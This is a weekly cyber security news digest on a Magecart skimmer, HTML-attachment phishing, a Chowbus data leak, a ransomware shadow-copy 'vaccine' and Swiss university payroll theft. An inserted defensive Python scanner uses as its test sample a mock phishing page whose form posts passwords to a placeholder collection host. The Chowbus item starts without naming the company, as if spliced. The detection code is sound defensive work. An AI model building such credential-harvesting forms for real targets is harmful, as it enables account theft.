Cyber Weekly Digest - Week #41
Another interesting week for cyber security, including a new phishing technique and a ransomware 'vaccine'. Keep reading to find out about all the biggest stories in cyber security from around the world.
Mobile network operator Boom! Mobile's website became the victim of a Magecart campaign. On Monday, it was discovered that the firm's US website had been compromised and was actively being used to harvest shopper information. Magecart is a term used to describe credit-card skimmer attacks and the cyber threat groups who use this method. Boom! Mobile has not yet responded to the attack, and shoppers are currently still at risk.
A new phishing scam that avoids detection was discovered earlier this week. Criminals are bypassing email security by attaching the fake website to the email itself as an HTML attachment. Typically, in a phishing campaign, the fake website would be reached by clicking a link. Researchers are urging people to avoid opening HTML attachments and be extra cautious of phishing emails during this time.
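Because the fake page travels inside the message rather than behind a link, a mail filter has to inspect the attachment itself. The following is an added example, not taken from the original digest: a Python check that finds HTML attachments and flags those containing a password field in a form that posts to a remote host. The function names, the sample message and the `example.test` domains are constructed for illustration.

```python
from email import message_from_string, policy
from email.message import EmailMessage
from html.parser import HTMLParser

class FormFinder(HTMLParser):
    """Records form targets and password inputs seen in an HTML document."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_fields = [], 0
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1

def scan_message(raw):
    """Return one finding per HTML attachment in a raw RFC 5322 message."""
    findings = []
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", errors="replace")
        finder = FormFinder()
        finder.feed(body)
        remote = [a for a in finder.actions if a.lower().startswith(("http://", "https://"))]
        findings.append({"filename": name, "password_fields": finder.password_fields,
                         "remote_actions": remote,
                         "suspicious": finder.password_fields > 0 and bool(remote)})
    return findings

def build_sample(html, filename="invoice.html"):
    """Constructed test message: plain-text body plus one HTML attachment."""
    msg = EmailMessage()
    msg["From"], msg["To"] = "billing@example.test", "user@example.test"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please review the attached invoice.")
    msg.add_attachment(html, subtype="html", filename=filename)
    return msg.as_string()

# Constructed sample: a login form that posts to a remote host (placeholder domain).
LOGIN_PAGE = ('<html><body><form action="https://collector.example.test/submit" method="post">'
              '<input type="text" name="user"><input type="password" name="pw"></form></body></html>')
if __name__ == "__main__":
    print(scan_message(build_sample(LOGIN_PAGE)))
```

This is a heuristic: an attachment that submits data through script rather than a form action would need additional checks.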
Just two months ago, the start-up company received $33 million in funding from investors to create an app to connect diners with Asian restaurants. The data breach will have significantly damaged the reputation of Chowbus due to the severity of the leak. Customers were sent a link to a file which contained 800,000 rows of data, with over 400,000 unique emails. It has been reported that due to the way the data was leaked, it was probably the result of a "disgruntled employee or ex-employee". Chowbus customers are being advised to change their account passwords and implement two-factor authentication immediately.
A ransomware "vaccine" program was released at the beginning of the week. Typically, ransomware infections delete shadow volume copies to prevent files from being recovered. Shadow volume copy snapshots are where Windows stores backups of your system and data files. The vaccine program works by terminating processes which try to delete shadow copies using Microsoft's vssadmin.exe program. Although this method can help prevent encryption by a large number of ransomware strains, some modern ransomware is still able to delete shadow volumes using other commands.
Three Swiss universities were targeted by threat actors who managed to drain employee salary transfers. The hackers started by carrying out spear-phishing attacks against the universities so that employees were tricked into providing their access data. The amount stolen is rumoured to be six figures, and the attackers immediately moved the funds abroad. The umbrella organisation "Swissuniversities" sent a warning email to encourage universities to stay on guard.